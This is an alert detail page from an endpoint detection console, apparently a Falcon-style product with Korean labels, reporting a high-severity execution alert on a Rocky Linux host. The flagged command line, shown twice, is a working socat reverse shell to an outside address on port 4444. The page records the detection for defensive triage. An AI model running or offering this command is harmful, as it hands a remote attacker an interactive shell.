Alert Details - DeFender X

Alert Information High

Alert ID: ind:b4aeee57c4b841bc95cb853f0aca95e1:1766236100039138431-30113-7786512
Composite ID: 84393bf974fd44bda943a25a6a7bc27f:ind:b4aeee57c4b841bc95cb853f0aca95e1:1766236100039138431-30113-7786512
설명: The commands executed on this CLI are suspicious and may be related to malicious activity. Review the commands to see if they are expected.
호스트: localhost.localdomain
상태: new
생성 시간: 2025-12-20 22:09:23
업데이트 시간: 2025-12-20 23:08:22

MITRE ATT&CK

Tactic: Execution
Technique: Command and Scripting Interpreter

Command Line

bash -c socat exec:'bash -li',pty,stderr tcp:10.10.10.10:4444

Raw JSON Data

{"id":"ind:b4aeee57c4b841bc95cb853f0aca95e1:1766236100039138431-30113-7786512","composite_id":"84393bf974fd44bda943a25a6a7bc27f:ind:b4aeee57c4b841bc95cb853f0aca95e1:1766236100039138431-30113-7786512","agent_id":"b4aeee57c4b841bc95cb853f0aca95e1","cid":"84393bf974fd44bda943a25a6a7bc27f","description":"The commands executed on this CLI are suspicious and may be related to malicious activity. Review the commands to see if they are expected.","severity":70,"severity_name":"High","confidence":80,"tactic":"Execution","tactic_id":"TA0002","technique":"Command and Scripting Interpreter","technique_id":"T1059","cmdline":"bash -c socat exec:\u0027bash -li\u0027,pty,stderr tcp:10.10.10.10:4444","filename":"bash","filepath":"/usr/bin/bash","sha256":"ec6d007d48ef11bc47ad3f372b4b20ff2f0d4e63867e7e4cc0f1b17b19fa88b2","status":"new","type":"ldt","created_timestamp":"2025-12-20T13:09:23.212650094Z","updated_timestamp":"2025-12-20T14:08:22.827969678Z","device":{"device_id":"b4aeee57c4b841bc95cb853f0aca95e1","cid":"84393bf974fd44bda943a25a6a7bc27f","agent_version":"7.31.18410.0","hostname":"localhost.localdomain","local_ip":"10.24.11.62","external_ip":"211.198.135.5","mac_address":"00-0c-29-89-f8-0a","platform_name":"Linux","os_version":"Rocky Linux 9.6"},"aggregate_id":"aggind:b4aeee57c4b841bc95cb853f0aca95e1:4843129837","CreatedAt":"2025-12-20T22:09:23.2126501+09:00","UpdatedAt":"2025-12-20T23:08:22.8279697+09:00"}

Quick Info

Severity High
Score 70
Agent ID b4aeee57c4b841bc95cb853f0aca95e1

Actions

Falcon Console에서 보기 목록으로 돌아가기